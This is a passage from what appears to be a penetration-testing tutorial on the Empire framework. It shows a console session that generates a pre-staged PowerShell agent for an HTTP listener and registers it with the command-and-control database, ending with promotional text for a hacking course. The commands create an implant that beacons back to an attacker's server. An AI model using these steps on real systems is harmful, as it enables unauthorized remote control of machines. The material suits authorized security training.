(Empire: external/generate_agent) > options Name: Generate Agent Module: external/generate_agent Authors: @harmj0y Description: Generates an agent code instance for a specified listener, pre-staged, and register the agent in the database. This allows the agent to begin beconing behavior immediately. Options: Name Required Value Description ---- -------- ------- ----------- Listener True Listener to generate the agent for. OutFile True /tmp/agent Output file to write the agent code to. Language True Language to generate for the agent. (Empire: external/generate_agent) >
Set the required options using the set command, and when complete, use the execute command to generate the module.
(Empire: external/generate_agent) > set Listener http (Empire: external/generate_agent) > set Language powershell (Empire: external/generate_agent) > execute [*] New agent N74NC8TD checked in [+] Pre-generated agent 'N74NC8TD' now registered. [*] powershell agent code for listener http with sessionID 'QKHQXGMU' written out to /tmp/agent [*] Run sysinfo command after agent starts checking in!
We will get into more detail about Empire in the upcoming sections. These are the first steps in getting Empire up and running, so stay tuned for more! You can leave any questions in the comments below.
Want to start making money as a white hat hacker? Jump-start your hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from cybersecurity professionals.
Other worthwhile deals to check out: